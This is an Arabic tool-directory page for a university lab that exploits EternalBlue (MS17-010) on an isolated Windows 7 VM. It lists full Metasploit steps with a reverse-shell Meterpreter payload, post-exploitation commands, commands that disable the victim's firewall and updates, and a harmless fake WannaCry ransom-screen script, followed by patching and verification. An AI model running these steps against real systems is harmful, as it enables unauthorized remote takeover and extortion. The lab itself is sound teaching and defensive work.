Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالتحليل البرمجيات الخبيثةCTFاختبار الاختراقالتعلم والتعليم
الفريق الأحمر
مختبرات وتدريب عملي
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

معمل تعليمي يوضح استغلال EternalBlue (MS17-010) ضد Windows 7 باستخدام Metasploit، بما في ذلك ما بعد الاستغلال ومحاكاة برنامج الفدية WannaCry وتخفيف التصحيح في بيئة معزولة.

عرض المستودع
5منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

توضيح استغلال EternalBlue (MS17-010)

معمل أمن سيبراني يوضح استغلال CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد نظام Windows 7 ضعيف، وتحقيق وصول على مستوى SYSTEM عبر Meterpreter.

يحاكي هذا المشروع أيضًا هجوم فدية من نمط WannaCry (عرض توضيحي آمن) ويوضح التخفيف باستخدام تصحيح MS17-010.


معلومات الوحدة

الوحدة: CSCM828 أمن الثغرات واختبار الاختراق

الطلاب:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

الجامعة: جامعة سوانسي


الموارد والتنزيلات

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 Security Update)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Virtual Machines Download)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  • VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


  • 1. نظرة عامة

    يوضح هذا المعمل:

    • الاستغلال عن بُعد لثغرة SMB (MS17-010)
    • الوصول على مستوى النواة عبر EternalBlue
    • إنشاء جلسة Meterpreter
    • تقنيات ما بعد الاستغلال
    • محاكاة هجوم فدية من نمط WannaCry (آمن)
    • التخفيف عبر التصحيح

    2. بيئة المعمل

    المتطلبات

    • VMware Workstation / VirtualBox
    • ذاكرة وصول عشوائي 8 جيجابايت كحد أدنى

    جهاز المهاجم

    • Kali Linux
    • Metasploit Framework

    جهاز الضحية

    • Windows 7 SP1 x64 (غير محدث)

    الشبكة

    • وضع المضيف فقط / NAT (بيئة معزولة)
    • تأكد من قدرة كلا الجهازين على التواصل

    ⚠️ يجب إجراء هذا المعمل في بيئة معزولة تمامًا.


    3. إعداد الضحية (Windows 7)

    شغّل في موجه أوامر المسؤول:

    تعطيل جدار الحماية

    root@kitploit:~
    netsh advfirewall set allprofiles state off
    

    التحقق من منفذ SMB

    root@kitploit:~
    netstat -an | findstr :445
    

    تعطيل التحديثات (لاستقرار المعمل)

    root@kitploit:~
    sc stop wuauserv
    sc config wuauserv start= disabled
    

    4. إعداد المهاجم (Kali Linux)

    التحقق من الاتصال

    root@kitploit:~
    ping <victim-ip>
    nmap -p 445 <victim-ip>
    

    5. خطوات الاستغلال

    الخطوة 1: مسح الهدف

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    المتوقع:

    • المضيف ضعيف (VULNERABLE)

    الخطوة 2: تشغيل الاستغلال

    root@kitploit:~
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <victim-ip>
    set LHOST <attacker-ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    run
    

    الخطوة 3: تأكيد الوصول

    root@kitploit:~
    meterpreter > getuid
    

    المتوقع:

    root@kitploit:~
    NT AUTHORITY\SYSTEM
    

    6. ما بعد الاستغلال

    root@kitploit:~
    sysinfo
    getuid
    ps
    screenshot
    shell
    whoami
    ipconfig
    

    الترحيل المستقر

    root@kitploit:~
    ps
    migrate <explorer.exe PID>
    

    7. محاكاة WannaCry (عرض توضيحي آمن)

    إنشاء الحمولة (Kali)

    root@kitploit:~
    cat > /tmp/wannacry64.bat << 'EOF'
    @echo off
    title WannaCryptor Demo - SAFE SIMULATION
    color 0a
    mode con: cols=80 lines=25
    cls
    
    setlocal enabledelayedexpansion
    
    set id=%random%-%random%-%random%
    set /a timeleft=60
    
    :main
    cls
    echo ========================================================
    echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
    echo ========================================================
    echo.
    echo  All files have been encrypted!
    echo.
    echo  Send 0.25 BTC to:
    echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
    echo.
    echo  Personal ID: %id%
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    echo Initializing encryption...
    timeout /t 2 >nul
    
    for /l %%i in (1,1,20) do (
        set /a percent=%%i*5
        call :progress !percent!
        timeout /t 1 >nul
    )
    
    goto countdown
    
    :progress
    set bar=
    set /a blocks=%1/5
    for /l %%b in (1,1,!blocks!) do set bar=!bar!#
    cls
    echo ========================================================
    echo           ENCRYPTING FILES...
    echo ========================================================
    echo.
    echo Progress: [%bar%] %1%%
    echo.
    
    set /a randfile=%random% %% 5
    if !randfile!==0 echo Encrypting: documents.docx
    if !randfile!==1 echo Encrypting: photos.jpg
    if !randfile!==2 echo Encrypting: database.sql
    if !randfile!==3 echo Encrypting: backup.zip
    if !randfile!==4 echo Encrypting: project.pptx
    
    exit /b
    
    :countdown
    cls
    
    :loop
    cls
    echo ========================================================
    echo           YOUR FILES ARE ENCRYPTED
    echo ========================================================
    echo.
    echo  Pay within the time limit or files will be lost!
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    if !timeleft! LEQ 0 goto end
    
    set /a timeleft-=1
    timeout /t 1 >nul
    goto loop
    
    :end
    cls
    echo ========================================================
    echo              TIME EXPIRED
    echo ========================================================
    echo.
    echo  Your files are permanently locked.
    echo.
    echo  (This was a SAFE DEMO simulation)
    echo.
    echo ========================================================
    pause
    EOF
    

    التحميل والتنفيذ

    root@kitploit:~
    meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
    meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
    

    8. التخفيف (توضيح التصحيح)

    الخطوة 1: تنزيل التصحيح

    • زر: https://www.catalog.update.microsoft.com/
    • ابحث: KB4012212 Windows 7 x64
    • نزّل ملف .msu

    الخطوة 2: تثبيت التصحيح

    root@kitploit:~
    wusa.exe KB4012212-x64.msu /quiet /norestart
    

    الخطوة 3: إعادة التشغيل

    root@kitploit:~
    shutdown /r /t 0
    

    الخطوة 4: التحقق من التصحيح

    root@kitploit:~
    systeminfo | findstr KB4012212
    

    الخطوة 5: إعادة تشغيل الاستغلال

    المتوقع:

    • فشل الاستغلال
    • لا توجد جلسة Meterpreter

    الخطوة 6: التحقق باستخدام Nmap

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    المتوقع:

    • غير ضعيف (NOT VULNERABLE)

    9. حل المشكلات

    المشكلةالحل
    فشل الاستغلالتحقق من الاتصال
    لا توجد جلسةعطّل جدار الحماية
    الجلسة تنقطعأعد تشغيل الاستغلال
    لا تظهر نافذة مرئيةرحّل إلى explorer.exe

    10. الاعتبارات الأخلاقية

    يُجرى هذا المشروع:

    • على أجهزة معملية خاضعة للتحكم فقط
    • في شبكة معزولة تمامًا
    • لأغراض تعليمية فقط

    الاستخدام غير المصرح به يخالف:

    • قانون إساءة استخدام الحاسوب في المملكة المتحدة لعام 1990

    11. الخلاصة

    يوضح هذا المعمل:

    • استغلال SMB في العالم الحقيقي باستخدام EternalBlue
    • اختراق Windows 7 على مستوى SYSTEM
    • محاكاة هجوم فدية (آمن)
    • أهمية التصحيح في الوقت المناسب
    تنزيل الأداة